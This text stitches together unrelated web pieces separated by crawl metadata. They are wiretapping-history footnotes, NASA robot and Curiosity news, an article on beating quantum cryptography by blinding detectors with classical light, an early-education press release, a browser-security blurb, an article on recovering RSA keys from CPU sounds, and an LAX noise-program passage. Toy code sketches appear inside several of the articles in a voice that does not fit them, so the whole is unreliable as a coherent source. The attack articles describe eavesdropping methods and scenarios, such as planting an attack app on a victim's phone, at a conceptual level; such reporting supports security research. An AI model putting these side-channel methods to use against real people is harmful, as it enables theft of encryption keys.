Jackson, memorandum, 2 May 1940, quoted in D.M. Ladd, “Memorandum for the Director, Re: Analysis of Criticisms of Bureau by James L. Fly,” 28 November 1949, 2, Fly File; Francis Biddle, In Brief Authority (Garden City, 1962), 167; Congress, Senate, Intelligence Activities Hearings Before the Select Committee to Study Governmental Operations With Respect to Intelligence Activities, 94th Cong., 1st sess., vol. 6, 1975, 315. 25 I.F. Stone, “Mr. Biddle is Afraid,” Nation, 22 May 1943, 735-736; Congress, House, Select Committee to Investigate the Federal Communications Commission, untitled press release, 78th Cong., 2d sess., 11 July 1943, Fly Collection. 26 U.S. House, Select Committee to Investigate the Federal Communications Commission, Hearings on Study and Investigation of the Federal Communications Committee Acting Under H. Res. 21, 78th Cong., 2d sess., 1943-1944, part 3, 2600, 26667-68. 27 A.H. Belmont to L.V. Boardman, “Memorandum Concerning James Lawrence Fly,” 3 November 1955, Fly File, 11. 28 U.S. Congress, Joint Committee on the Investigation of the Pearl Harbor Attack, Pearl Harbor Attack, “Report of Army Pearl Harbor Board,” 79th Cong., 1st. sess., 1946, vol. 39, 277. 29 Belmont to Boardman, 11. 
30 George Elsey to President Truman, memorandum, 2 February 1950, in Athan G. Theoharis, The Truman Presidency: The Origins of the Imperial Presidency and the National Security State (Stanfordville, N.Y., 1979), 293-94; Sally Fly Connell, typewritten notes for a biography of James lawrence Fly, Fly Papers. 31 “James Lawrence Fly, 1898-1966,” obituary, Civil Liberties, March 1966 unpaged clipping Fly Papers. 32 Robert J. Lamphere and Tom Shachtman, The FBI-KGB War: A Special Agent’s Story (New York, 1986), 96-125; United States v. Coplon, 185 F. (2d) 629 (2 Cir 1950); Coplon V. United States, 191 F. (2d) 749 (D.C. Cir 1951; Robert K. Welch, “FBI Seizes U.S. Clark and Russian as Spies [Washington] Evening Star, 5 March 1949, sec. A, p.1; “Baby Face,” Time, 14 March 1949, 28; “It was Love,” Time, 27 June 1949, 19; Bill Brinkley, “Miss Coplon Admits Sharing Hotel Rooms with Federal Lawyer,” Washington Post, 22 June 1949, sec, A, p.1. 33 “Wiretap Genesis Inputed to Dewey,” New York Times, 29 March 1949, p.19. 34 Ladd to the Director, memorandum, 28 August 1951, Fly File, 14. 35 James Lawrence Fly, Petition of New York County Criminal Courts Bar Association to the Honorable The Attorney General of the United States, June 1949, Fly Papers. 36 Lamphere and Shactman, 108-10; Joseph Paull, “Coplon Appeal is Taken Under Advisement After Judge Questions Wire-Tap Evidence,” Washington Post, 1 December 1950, sec. B, p.4. 37 Bill Brinkley, “Russia Got Atom Equipment, Court Told; FBI Bares Secrets Rather Than Drop Coplon Case,” Washington Post, 8 June 1949, sec. A, p.1; Lamphere and Shactman, 114-15. 38 Bill Brinkley, ‘Names of Film Stars Figure in FBI Papers Read to Coplon Jurors,” Washington Post, 9 June 1949, sec. A, p. 1; “FBI Agent Says Coplon Wire Not Tapped at Beginning,” Washington Post, 11 January 1950, sec. A, p.2; United States v. Coplon, 185 F. 2d 639 (2nd Cir 1950); Edward K. Nellor, “FBI Memo Lists Top D.C. Reds,” [Washington] Times Herald, 10 June 1949, p.1; James Lawrence Fly, Untitled Notes for an Autobiography (c. 1950), handwritten, Fly Collection, 5. 39 “What the FBI Heard,” Time, 9 January 1950, 12; Carles Grutzner, “Judge Presses U.S. On Coplon records,” New York Times, 6 January 1950, p. 6; James Lawrence Fly, Counsel to American Civil Liberties Union, Amicus Curiae Brief for U.S. District Court, District of Columbia, United States of America v. Judith Coplon, Fly Papers, 2. 40 James Lawrence Fly, “FBI’s Wiretap Activities,” New York Times, 17 January 1950, p. 26. 41 Unsigned and undated petition asking for investigation of the FBI, Fly File and Fly Papers; L.B. Nichols to Mr. Tolson, memorandum, 17 February 1950, Fly File; Walter Trohan, “Fly, Foe of FBI, called Shield for Disloyalty,” Chicago Tribune, 9 February 1950, part 2, p.1; L.B. Nichols to Mr. Tolson, memoranda, 9 May 1950, 12 May 1950, 6 July 1950, Fly File. 42 United States v. Coplon, 185 F. 2d 629, 635, 637, 640 (2d Cir 1950). 43 Coplon v. United States, 191 F. 2d 749 (D.C. Cir 1951); Sidney E. Zion, “U.S. Drops Charges in Coplon Spy Case,” New York Times, 7 January 1967, p.1. 44 James Lawrence Fly, “Threat to Liberty, Defiance of Law See in FBI Wire-Tapping,” Washington Post, 7 January 1950, sec. A, p. 9. 45 FBI Wiretapping to Continue, McGrath Says After Interview,” Washington Post, 9 January 1950, sec. A, p. 1; Chalmers M. Roberts, “Anit-Tygoon Conference Here Lauded,” Washington Post, 9 January 950, sec. A, . 1; “Dirty Business,” Washington Post, 11 January 1950, sec. A, p. 10. 46 Fly, Notes for autobiography, 24-25. 
47 “Harry’s Day in Court,” Time, 27 February 1950, 23; D. M. Ladd to the Director, memorandum, 28 November 1949, Fly File; U.S. House, Deliberation on bill that would deport certain aliens, H.R. 5138, 76th Cong. 3d sess., Congressional Record (22 June 1940) 86 pt. 8:9031-36; James Lawrence Fly to Messrs. Hays and Fraenkel memorandum RE: United States v. Harry Bridges, 10 October 1949, Fly Papers. 48 William Fitts, interview with Sally Fly Connell, 14 August 1967, Oral History Collection, Columbia University, New York City, 38-39. 49 Lawrence E. Davies, “Court Room Fight for Bridges Opens,” New York Times, 5 October 1949, p. 26; Luther A. Huston, “Supreme Court Frees Bridges Under Statue of Limitations,” New York Times, 16 June 1953, p. 1; Edward Brecher, interview by Sally Fly Connell, 11 September 1967, Oral History Collection, Columbia University, 34; James Lawrence Fly to President Harry Truman, RE: Charge by TVA Loyalty Board 19 July 1951, Fly Papers; “Fly Assails Effort “to Destroy My Character,” Miami Herald, 8 March 1954, sec. A, p. 18. 50 James Lawrence Fly, “The Case Against Wire Tapping,” Look, 27 September 1949, 35 et seq; James Lawrence Fly, “The Wire-Tapping Outrage,” New Republic, 6 February 1950, 14-15. 51 James Lawrence Fly, Petition to the Federal Communications Commission re: Wiretapping, February 1950, Fly papers; James Lawrence Fly, “Fly Scores Legal profession For Its Apathy Toward F.B.I. Wire Tapping,” Harvard Law School Record, 26 April 1950, 4. 52 James Lawrence Fly, “A Wholesome Thing,” Saturday Review of Literature, 23 December 1950, 15. 53 James Lawrence Fly, “Halo for Mr. Hoover?” Saturday Review of Literature, 29 December 1956,11-12. 54 U.S. Senate, Subcommittee of the Committee on the Judiciary, Wiretapping for National Security: Hearings on S. 832, S. 2753, S. 3229, H.R. 8649, 83rd Cong., 2d sess., 1954, 230, 250, 15, 118; U.S. House, Subcommittee no. 3, Committee on the Judiciary, Wiretapping for National Security: Hearings on H.R. 408, H.R. 477, H.R. 3552, H.R. 5149, 83rd Cong., 1st sess., 1953, 4, 86. 55 Ibid., 1-5. 56 McGrath to Emanuel Celler, 2 February 1951, in US. House, Wiretapping for National Security, 20; Hoover to McGrath, “Personal and Confidential Memo,” 6 October 1951, in From the Secret Files of J. Edgar Hoover, 136. 57 U.S. House, Wiretapping for National Security, passim, 36, 56, 75. 58 Ibid., 66. 59 Ibid., 78-79, 83. 60 C.P. Trussell, “Wiretapping Bill Is Voted By House,” New York Times, 9 April 1954, p. 1. 61 Edward R. Murrow, See It Now, television program on CBS network, 1 December 1953, videotape copy at Museum of Television and Radio, New York City. 62 Jones to Nichols, memorandum, 2 December 1953, Fly File, 3. 63 Fly to Keating, 4 December 1953, Fly Papers. 64 American Civil Liberties Union, “Statement on Wiretapping,” April 1951, Fly Papers. 65 Fly to Keating, 2. 66 Fly to President Truman, 19 July 1951, Fly Papers. 67 Who’s Who in America, 49th ed. (New Providence, N.J., 1995), 3620. 68 “Seeds Post Asks FCC to Probe James Fly,” Miami Herald, 7 March 1954, sec. A, p. 18; Fly to O’Brian, 16 March 1954, Fly Papers. 69 U.S. Senate, Wiretapping for National Security, 191, 196. 70 Ibid., 189; James Lawrence Fly, “Mr. Fly on Wire Tapping: Former FCC Member Expounds His Views of ‘Dirty Business’ In Reply to Star Editorial,” [Washington] Evening Star, 13 June 1949, sec. A, p. 10. 71 United States Code Annotated, title 18, sec. 2517 (St. Paul, 1998), 229. 72 U.S. Senate, Wiretapping for National Security, 192. 73 C.P. 
Trussell, "Senators Tie Up Wiretapping Bill," New York Times, 10 August 1954, p. 11; "Wire-Tap Approval Sought," New York Times, 18 November 1954, p. 17. 74 William F. Brown and Americo R. Cinquegrana, "Warrantless Physical Searches for Foreign Intelligence Purposes: Executive Order 12,333 and the Fourth Amendment," Catholic University Law Review 35 (1985): 97-128; United States Code Annotated, chapter 36, title 50, secs. 1801-11, chapter 119, title 18, secs. 2510-22 (St. Paul, 1998). 75 Sally Fly Connell, Notes for a biography of James Lawrence Fly, Fly Papers; "Stern Decision on Ch. 7 Miami," Broadcasting, 19 September 1960, 71. 76 Jane Eads, "Fly of Texas Thinks Life Would be Dull Without Weekly Lashings," Houston Post, 12 December 1943, Sunday magazine, p. 2. 77 Fly, Notes for autobiography, c, 1.
Robotic spheres aboard the International Space Station soon will be quite a bit smarter, using Google technology to fly safely and adroitly around the orbiter. NASA's Ames Research Center is teaming up with Google's Project Tango team to add the company's new 3D technology to the tech tools aboard the Orbital Sciences Corp.'s Cygnus cargo spacecraft. Cygnus is scheduled to lift off for a journey to the space station at 12:52 p.m. EDT on Sunday, July 13, filled with about 3,300 pounds of supplies. The launch was postponed from last Saturday due to severe weather. Along with the Project Tango equipment, Cygnus will deliver food for the astronauts living on the station, spare parts for scientific experiments and extra hardware.

Google's technology comes out of Project Tango, an effort to create 3D-enabled tablets and smartphones. The astronauts will integrate the Google tech with a robotic platform that will work inside the space station. Smart SPHERES is a prototype free-flying space robot based on NASA's Synchronized Position Hold, Engage, Reorient Experimental Satellites. NASA has been testing SPHERES on the space station since 2011. Chris Provencher, Smart SPHERES project manager at NASA contractor SGT, said the astronauts will upgrade the robots to use Google's Tango 3D smartphone, which uses a custom 3D sensor and multiple cameras.

Starting in early August, the astronauts will turn on the sensors that enable the 3D navigation and take the SPHERES throughout the station, mapping its entire layout. About a month later, NASA should know if the map is accurate. At that point, they'll upload it to the floating robots and they can begin using that map to navigate throughout the space station. "It'll be a big advance," said Provencher. "The robots have been restrained to flying in a small 2-foot by 2-foot by 2-foot area. One hurdle we still need to get over is to fly that robot anywhere in the space station and this should do that."

NASA has been looking to use small flying robots to perform tasks on the space station. For instance, Provencher said the SPHERES could use a camera to give flight controllers in Houston views of the entire inside of the station for situational awareness. The flying robots also will carry air quality and noise sensors. "These are all tasks the crew does for themselves right now," said Provencher. "We're trying to offload crew tasks to give them more time for science instead of housekeeping." The SPHERES robots now on the space station are prototypes. If the 3D mapping navigation capability works as hoped, it will be part of the production version of the devices. "There would have to be some kind of design changes to make it fully autonomous," said Provencher. "Right now, the SPHERE is used for testing, not tasks. The idea is to let the free-flying robot have purpose and be useful by letting it freely roam throughout the space station."

Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed.
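The plan Provencher describes boils down to two phases: first record what the station looks like from known positions (the mapping run the crew will perform), then recognize where the robot is later by matching fresh sensor data against that stored map. The toy Python sketch below illustrates only that idea and nothing more; it is not NASA or Google software, and the one-dimensional "corridor," the observe() sensor model, and the localize() matcher are invented stand-ins for a real 3D depth sensor and map.

# A pretend one-dimensional station corridor: each cell has a distinctive
# appearance value, as if measured by a depth or vision sensor.
corridor = [3, 7, 7, 2, 9, 4, 4, 8, 1, 6]

def observe(position):
    # What the sensor "sees" at a position: the cell plus its neighbors.
    return tuple(corridor[max(0, position - 1): position + 2])

# Phase 1: mapping run. The robot is moved through the whole corridor and
# an observation is stored for every known position.
station_map = {pos: observe(pos) for pos in range(len(corridor))}

# Phase 2: localization. Given only a fresh observation, find the stored
# position whose recorded observation matches it.
def localize(fresh_observation):
    matches = [pos for pos, obs in station_map.items() if obs == fresh_observation]
    return matches  # more than one match would mean the area is ambiguous

print(localize(observe(4)))   # -> [4]: the robot recognizes where it is
print(localize(observe(0)))   # -> [0]

The design point the sketch makes is the same one in the article: once the verified map is uploaded, the robot no longer needs an external reference or a small fenced-off test volume, because any fresh observation can be matched against the map to recover its position.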
NASA's super rover Curiosity has collected a sample from the inside of a rock on Mars, the first time the process has been done on another planet, NASA announced Wednesday. The robotic rover sent images back to NASA scientists showing the drilling and an image of the powdered-rock sample in the rover's scoop. "Seeing the powder from the drill in the scoop allows us to verify for the first time the drill collected a sample as it bore into the rock," said Scott McCloskey, NASA's drill systems engineer for Curiosity. "Many of us have been working toward this day for years," he said. "Getting final confirmation of successful drilling is incredibly gratifying. For the sampling team, this is the equivalent of the landing team going crazy after the successful touchdown."

The rover is about six months into a two-year mission to help scientists figure out if Mars has, or has ever had, an environment that could support life, even life in a microbial form. The rover, which carries 17 cameras and 10 scientific instruments, has already found evidence of a thousand-year water flow on Mars. The finding came in the form of an outcropping of rocks that appeared to have been heaved up by a vigorous water flow. Curiosity's two Martian predecessors - the rovers Spirit and Opportunity - are not equipped for drilling. NASA scientists have been eager to drill so they can analyze Martian rocks for information about their mineral and chemical composition.

Curiosity's robotic arm bored a 2.5-inch-deep hole into the rock on Feb. 8, taking in the powder the drilling created. After going through an onboard sieve, the powder will be delivered to Curiosity's analysis instruments. The rock that was drilled sits on a section of flat bedrock. NASA has dubbed the rock "John Klein," in memory of a Mars Science Laboratory deputy project manager who died in 2011. Scientists chose the rock for the rover's first drilling because they think it may hold evidence of an ancient wet environment. NASA hopes the rock's composition may give them clues to its history.

Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, or subscribe to Sharon's RSS feed.
<urn:uuid:d213d88b-12fe-42c0-94cb-55b648119149>
CC-MAIN-2017-09
http://www.computerworld.com/article/2495308/emerging-technology/nasa-rover-curiosity-grabs-first-martian-rock-sample.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00408-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947957
480
3.421875
3
Quantum cryptography has been pushed onto the market as a way to provide absolute security for communications. It is already used in Swiss elections to ensure that electronic vote data is securely transmitted to central locations. And as far as we know, no current quantum cryptographic system has been compromised in the field. This may be due to the work of security researchers who spend all their waking moments—and quite a lot of their non-waking moments—trying to pick the lock on quantum systems.

Their general approach can be summed up as follows: if you can fool a detector into thinking a classical light pulse is actually a quantum light pulse, then you might just be able to defeat a quantum cryptographic system. But even then the attack should fail, because quantum entangled states have statistics that cannot be achieved with classical light sources—by comparing statistics, you could unmask the deception. In the latest of a series of papers devoted to this topic, a group of researchers has now shown that the statistics can also be faked.

Quantum cryptography relies on the concept of entanglement. With entanglement, some statistical correlations are measured to be larger than those found in experiments based purely on classical physics. Cryptographic security works by using the correlations between entangled photon pairs to generate a common secret key. If an eavesdropper intercepts the quantum part of the signal, the statistics change, revealing the presence of an interloper.

But there's a catch here. I can make a classical signal that is perfectly correlated to any signal at all, provided I have time to measure said signal and replicate it appropriately. In other words, these statistical arguments only apply when there is no causal connection between the two measurements. You might think that this makes intercepting the quantum goodness of a cryptographic system easy. But you would be wrong. When Eve intercepts the photons from the transmitting station run by Alice, she also destroys the photons. And even though she gets a result from her measurement, she cannot know the photons' full state. Thus, she cannot recreate, at the single-photon level, a state that will ensure that Bob, at the receiving station, will observe identical measurements. That is the theory, anyway.

But this is where the second loophole comes into play. We often assume that the detectors are actually detecting what we think they are detecting. In practice, there is no such thing as a single-photon, single-polarization detector. Instead, what we use is a filter that only allows a particular polarization of light to pass and an intensity detector to look for light. The filter doesn't care how many photons pass through, while the detector plays lots of games to try to be single-photon sensitive when, ultimately, it is not.

It's this gap between theory and practice that allows a carefully manipulated classical light beam to fool a detector into reporting single-photon clicks. Since Eve has measured the polarization state of the photon, she knows what polarization state to set on her classical light pulse in order to trick Bob into recording the same measurement result. When Bob and Alice compare notes, they get the right answers and assume everything is on the up and up. The researchers demonstrated that this attack succeeds with standard (but not commercial) quantum cryptography equipment under a range of different circumstances.
In fact, they could make the setup outperform the quantum implementation for some particular settings. The researchers also claim that this attack will be very difficult to detect, but I disagree. The attack depends on very carefully setting the power in the light beams so that only a single photodetector is triggered in Bob's apparatus. Within the detector, the light beam gets divided into two and then passed through polarization filters and detected. For a single photon beam, this doesn't matter—only one detector can click at any one time. But Eve's bright bunch of photons could set multiple detectors clicking at the same time. If you periodically remove filters, then Eve will inadvertently trigger more than a single photodiode, revealing her presence.

Physical Review Letters, 2011, DOI: 10.1103/PhysRevLett.107.170404
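To make the blinding idea concrete, here is a deliberately simplified Monte Carlo sketch of the logic described above. It does not model real quantum statistics, measurement bases, or hardware; the pulse behavior, probabilities, and function names are illustrative assumptions. The point is only that a faked-click attack can reproduce perfect correlations while the filter is in place, yet betrays itself through double clicks when the filter is occasionally removed.

```python
import random

def eve_faked_click(eve_result, filter_removed):
    """Eve resends a bright classical pulse tailored to force Bob's detector
    to report `eve_result`. With the filter in place only one photodiode
    fires; with the filter removed the bright pulse spills into both
    photodiodes, producing a telltale double click."""
    if filter_removed:
        return "double"      # both photodiodes fire
    return eve_result        # Bob records exactly what Eve measured

def run(n_pulses=100_000, p_filter_removed=0.1, eavesdropper=True):
    double_clicks = 0
    agreements = 0
    checked = 0
    for _ in range(n_pulses):
        alice = random.randint(0, 1)                 # Alice's outcome for this pair
        filter_removed = random.random() < p_filter_removed
        if eavesdropper:
            eve = alice                              # Eve measured the intercepted photon
            bob = eve_faked_click(eve, filter_removed)
        else:
            bob = alice                              # ideal correlation; a true single
                                                     # photon never double-clicks
        if bob == "double":
            double_clicks += 1
        else:
            checked += 1
            agreements += (bob == alice)
    return agreements / max(checked, 1), double_clicks

corr, doubles = run(eavesdropper=True)
print(f"with Eve:    apparent correlation {corr:.3f}, double clicks {doubles}")
corr, doubles = run(eavesdropper=False)
print(f"without Eve: correlation {corr:.3f}, double clicks {doubles}")
```

Run as-is, the faked channel shows the same perfect agreement as the honest one, but only the faked channel racks up double clicks on the filter-removed pulses, which is the detection strategy suggested above.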
<urn:uuid:aba21ba5-e76f-40db-a3b1-8a4c4465e272>
CC-MAIN-2017-09
https://arstechnica.com/science/2011/11/researchers-show-how-to-break-quantum-cryptography-by-faking-quantum-entanglement/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00460-ip-10-171-10-108.ec2.internal.warc.gz
en
0.951349
827
2.9375
3
WASHINGTON, DC--(Marketwired - March 31, 2014) - The National Association for the Education of Young Children's (NAEYC) Week of the Young Child™ (April 6-12, 2014) draws attention to how a high-quality early childhood experience in the first few years of life sets a child's path for success in school and in life, and offers tips parents can use to be sure they're choosing a high-quality program.

"Week of the Young Child™ reinforces that the early years (birth through age 8) are critical learning years, and qualified early childhood professionals accelerate how our children learn, develop, build the skills to get along with others, and succeed in school and life," said Rhian Evans Allvin, NAEYC's Executive Director. "An NAEYC-accredited program offers a safe, nurturing, and stimulating environment during the early years, with specially skilled and knowledgeable staff and professionals who can ensure children have the most positive learning experience possible."

NAEYC offers the following tips parents can use when selecting a safe, nurturing and stimulating learning environment for their children.

For infants, a high-quality program means:
- Group size is limited to no more than eight babies, with at least one teacher for every three children.
- Each infant is assigned to a primary caregiver, allowing for strong bonds to form and so each teacher can get to know a few babies and families very well.
- Teachers show warmth and support to infants throughout the day; they make eye contact and talk to them about what is going on.
- Teachers are alert to babies' cues; they hold infants or move them to a new place or position, giving babies variety in what they can look at and do.
- Teachers pay close attention and talk and sing with children during routines such as diapering, feeding, and dressing.
- Teachers follow standards for health and safety, including proper hand washing to limit the spread of infectious disease.
- Teachers can see and hear infants at all times.
- Teachers welcome parents to drop by the home or center at any time.

For toddlers, a high-quality program means:
- Children remain with a primary teacher over time so they can form strong relationships.
- The teacher learns to respond to the toddler's individual temperament, needs, and cues, and builds a strong relationship and open communication with the child's family.
- Teachers recognize that toddlers are not yet able to communicate all of their needs through language; they promptly respond to children's cries or other signs of distress.
- Teachers set good examples for children by treating others with kindness and respect; they encourage toddlers' language skills so children can express their wants and needs with words.
- The physical space and activities allow all children to participate. For example, a child with a physical disability eats at the same table as other children.
- Teachers frequently read to toddlers, sing to toddlers (in English and children's home languages), do finger-plays, and act out simple stories as children actively participate.
- Teachers engage toddlers in everyday routines such as eating, toileting, and dressing so children can learn new skills and better control their own behavior.
- Children have many opportunities for safe, active, large-muscle play both indoors and outdoors.
- Parents are always welcome in the home or center.
- Teachers have training in child development or early education specific to the toddler age group.
For preschoolers ages 3 to 5, a high-quality program means:
- Children follow their own individual developmental patterns, which may vary greatly from child to child.
- Children feel safe and secure in their environment.
- Children have activities and materials that offer just enough challenge -- they are neither so easy that they are boring nor so difficult that they lead to frustration.
- Children can connect what they learn with past experiences and current interests.
- Children have opportunities to explore and play.

To find a NAEYC accredited center or school and for more tips for choosing a high-quality early childhood education program go to http://families.naeyc.org

NAEYC's mission is to serve and act on behalf of the needs, rights and well-being of all young children with primary focus on the provision of educational and developmental services and resources. Founded in 1926, the National Association for the Education of Young Children is the largest and most influential advocate for high-quality early care and education in the United States. Learn more at www.naeyc.org.
<urn:uuid:c29aaca9-519d-418f-a497-d9969028ce31>
CC-MAIN-2017-09
http://www.marketwired.com/press-release/essential-ingredients-high-quality-early-childhood-education-highlighted-week-young-1894257.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00581-ip-10-171-10-108.ec2.internal.warc.gz
en
0.952863
919
2.9375
3
Regular browsers, such as the one that came with your PC or mobile device, leak data on the internet like a sieve. The inherent vulnerabilities of the local browser model allow criminal hackers to infiltrate computers and steal or manipulate data. Firewalls and antivirus software provide little or no protection against modern attackers and their tools. Browser add-ons, plugins and extensions promising “extra” security and privacy cannot be trusted; their makers have even been caught selling private user data.

Because the “traditional” browser architecture is inherently unsafe and promotes data leakage, a new generation of secure browsers has been developed for security-conscious companies and consumers. Not all supposedly “secure” browsers are equal, and some are not secure at all. How can you tell the difference? In this second part of “8 Must-Have Features of a Secure Browser” (read Part 1 here), we examine another four features and capabilities your browser must have to deserve the label “secure” for business or personal use.
<urn:uuid:bf74024f-373c-4209-85be-36c2a4cca1ab>
CC-MAIN-2017-09
https://go.authentic8.com/blog
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00281-ip-10-171-10-108.ec2.internal.warc.gz
en
0.921115
213
2.75
3
It sounds too preposterous for even James Bond: by placing a mobile phone next to a PC, researchers can "listen" to the faintest sound a CPU makes as it churns away on RSA-encoded content and extract the keys themselves. Preposterous, except for the fact that Adi Shamir, one of the co-developers of the RSA encryption algorithm, co-wrote the paper that describes how to do it. Daniel Genkin and Eran Tromer were the other two authors.

"The attack can extract full 4096-bit RSA decryption keys from laptop computers (of various models), within an hour, using the sound generated by the computer during the decryption of some chosen ciphertexts," the paper's authors wrote. "We experimentally demonstrate that such attacks can be carried out, using either a plain mobile phone placed next to the computer, or a more sensitive microphone placed 4 meters away."

The authors were able to experimentally succeed with their method using either an ungainly, and extremely obvious, parabolic antenna from 4 meters away, or by using a generic mobile phone from just 30 centimeters away. Naturally, better listening equipment decreased the time to extract the RSA keys.

And it gets even worse: merely touching the PC also allowed an attacker to extract the keys by measuring the electric potential of the PC chassis. In this case, an attacker who touched the PC (while surreptitiously measuring its electric potential) should be able to extract the keys. And by persuading the victim to plug an innocuous-looking VGA or Ethernet cable into his laptop, the attacker could measure the shield potential elsewhere and get the keys as well.

Typically, simply having physical access to an unsuspecting PC is enough for some security experts to throw up their hands and concede that the attacker has won. And that's true, in this case, as well. But the paper's authors demonstrated an "attack" running in a lecture hall, and suggested other plausible scenarios:
- Install an attack app on your phone. Set up a meeting with your victim, and during the meeting, place your phone on the desk next to the victim's laptop.
- Break into your victim's phone, install your attack app, and wait until the victim inadvertently places his phone next to the target laptop.
- Construct a webpage, and use the microphone of the computer running the browser using Flash or another method. When the user permits the microphone access, use it to steal the user's secret key.
- Put your stash of eavesdropping bugs and laser microphones to a new use.
- Send your server to a colocation facility, with a good microphone inside the box. Then acoustically extract keys from all nearby servers.
- Get near a protected machine, place a microphone next to its ventilation holes, and extract the secrets.

The techniques the authors describe can be countered by sound dampening, but the white noise of a PC's fan can be pretty easily filtered out. The researchers said that they supplied their attack vector to GnuPG developers before publication, let them develop revised code, and yet it was still vulnerable. The answer may lie in using software to try to obfuscate the audible sound emanations, they said.

In any case, the paper that Genkin, Shamir, and Tromer authored is seriously scary stuff, especially for business or government travelers carrying sensitive information outside the country as well as into and through strange hotels and conference rooms.

This story, "RSA Keys Snatched By Recording CPU Sounds with a Phone" was originally published by PCWorld.
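The signal-processing side of such an attack comes down to telling apart the faint spectral signatures a CPU emits while running different code paths. The following is only a toy illustration of that single idea using synthetic data: the sample rate, the chosen frequencies, and the notion that individual key-dependent code paths leak at distinct tones are assumptions made for demonstration, not the adaptive chosen-ciphertext procedure the paper actually describes.

```python
import numpy as np

FS = 192_000     # assumed sample rate (Hz) of the recording equipment
DURATION = 0.5   # seconds of "acoustic leakage" captured per decryption

def synthetic_trace(dominant_hz, noise=0.5):
    """Stand-in for a recording made while the CPU decrypts one chosen
    ciphertext: a faint tone whose frequency shifts with the code path,
    buried in wideband fan and ambient noise."""
    t = np.arange(int(FS * DURATION)) / FS
    return np.sin(2 * np.pi * dominant_hz * t) + noise * np.random.randn(t.size)

def spectral_peak(trace):
    """Return the dominant frequency of a trace from its FFT power spectrum."""
    spectrum = np.abs(np.fft.rfft(trace * np.hanning(trace.size))) ** 2
    freqs = np.fft.rfftfreq(trace.size, d=1 / FS)
    return freqs[np.argmax(spectrum)]

# Two hypothetical code paths (say, different key-bit handling) leaking at
# different frequencies -- illustrative values, not measured ones.
trace_a = synthetic_trace(dominant_hz=34_000)
trace_b = synthetic_trace(dominant_hz=38_500)

print(f"path A peaks near {spectral_peak(trace_a):,.0f} Hz")
print(f"path B peaks near {spectral_peak(trace_b):,.0f} Hz")
```

If two internal states of the decryption produce distinguishable peaks like these, an attacker can classify each observation; the hard parts the researchers solved are getting such distinguishable signals out of real hardware and choosing ciphertexts that expose the key bit by bit.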
<urn:uuid:6061070d-83b4-4b22-84dc-3acdb5b84064>
CC-MAIN-2017-09
http://www.cio.com/article/2380043/security0/rsa-keys-snatched-by-recording-cpu-sounds-with-a-phone.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00633-ip-10-171-10-108.ec2.internal.warc.gz
en
0.949783
744
2.859375
3
With the coming of age of civil aviation in the 1930s and 1940s, the rural settings of many U.S. airports began to change. By the 1950s, expanding metropolitan centers surrounded formerly remote airfields with residential and commercial developments. As more powerful airliners rolled off the drawing boards, noise became an issue for those living nearby. With the arrival of commercial jets in the late '50s, neighborhoods under the flight paths of major airports became almost unlivable.

Mounting complaints, declining property values and class-action lawsuits by residents and cities prompted the aviation industry and state and federal governments to find solutions to the problem. California passed Title 21 and Title 24, mandating that airports and local governments provide mitigation measures. By 1979, Federal Aviation Regulations Part 150 enabled airports and local jurisdictions to apply for funding to either sound-insulate affected homes or acquire them and relocate their owners. In the 1960s and 1970s, the Los Angeles Department of Airports -- now Los Angeles World Airports (LAWA) -- removed 2,800 homes and relocated 7,000 residents from around Los Angeles International Airport (LAX).

Airport Noise Mitigation Program

In compliance with California regulations, the LAWA Noise Management Bureau (NMB) recently completed plans for an Airport Noise Mitigation Program (ANMP) to sound-insulate approximately 25,000 residences surrounding LAX. The construction phase of the program, begun in 1996, will be completed in the next five to seven years, at a cost of more than $200 million. Funding for the LAWA program is generated from "passenger facility charges," a $3 surcharge on departing passengers, authorized by the Federal Aviation Administration. Jurisdictions in the program areas can use LAWA funds and/or FAA grants to underwrite sound-insulation work in their respective areas. At present, ANMP applies only to residences. In the future, schools, churches, hospitals and other sensitive land uses may be added to the program.

To determine which land uses (number and type of parcels) qualified for sound-insulation, LAWA set up a sophisticated network of noise-monitoring stations in jurisdictions surrounding LAX. Data from the network is loaded into an ArcInfo GIS running a program that models noise contours at the 65, 70, and 75 decibel (dB) levels. The contours are overlaid on a parcel-level basemap. Detailed information on parcels within the contours is then obtained from the related database, also used to phase qualifying residences into the sound-insulation schedule.

NMB Environmental Supervisor Mark Adams pointed out that contours also help define costs. "For example, we know that a single-family home at the 75dB contour is going to cost more to insulate than one at 65dB. To estimate the total cost of the project and compute a construction schedule, we need a fairly accurate estimate of the number and type of homes at these noise levels. The contours help us to access that information."

Data, tables, maps and information on all ANMP phases were required to be submitted in a lengthy annual report to the California Department of Transportation's Division of Aeronautics. Preparation and publication of the documents required a month or more. Wyle Laboratories, acoustical engineers and prime contractor for the program, was responsible for coordinating development of the initial report.
Psomas and Associates, civil engineers with GIS expertise, had the task of updating and expanding a parcel-level database, and developing tools to speed up preparation of ANMP reports. According to Psomas Vice President Matt Rowe, the Santa Monica, Calif.-based firm began with a parcel-level database developed and maintained by NMB since the early 1980s. Although originally intended for a different project, the database covered much of the LAWA noise-mitigation planning area. An updated and expanded version, Rowe explained, could be used not only for spatial data management and noise analysis but also for monitoring the sound-insulation phase of the program. "Obviously, LAWA is not going to insulate and/or acquire 25,000 properties all at once," he said. "They will use the database to phase in that part of the program, beginning with the most heavily impacted areas close to the airport, and work their way out."

Using ArcView and AutoCAD, Psomas expanded the original database to encompass additional areas in the five jurisdictions surrounding LAX. The process included updating general community plans and incorporating changes in jurisdictions, zoning and housing. The firm also populated the database with local-use codes, parcel numbers, TRW information, census data from TIGER line files and Thomas Brothers street maps. General community plans were then overlaid on the basemaps, and the noise contours placed over these.

